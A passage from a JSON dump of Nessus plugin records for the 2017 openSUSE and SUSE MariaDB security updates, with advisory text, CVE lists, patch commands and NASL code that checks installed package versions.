"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2017-257.NASL", "href": "https://www.tenable.com/plugins/nessus/97277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-257.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97277);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2017-257)\");\n script_summary(english:\"Check for the openSUSE-2017-257 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35\n\nRelease notes and changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1008253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022428\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-release-notes\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient_r18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debugsource-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-errormessages-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient_r18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-bench-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-bench-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-client-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-client-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-debugsource-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-errormessages-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-test-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-test-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-tools-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-tools-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:25:23", "description": "This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35 Release notes and\n changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-08T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-02-08T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2017-0412-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0412-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97064);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35 Release notes and\n changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1008253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022428\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-release-notes\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6664/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3238/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3243/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3244/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3257/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3258/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3312/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3317/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3318/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170412-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?14c3ceff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch\nSUSE-SLE-WE-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-207=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) 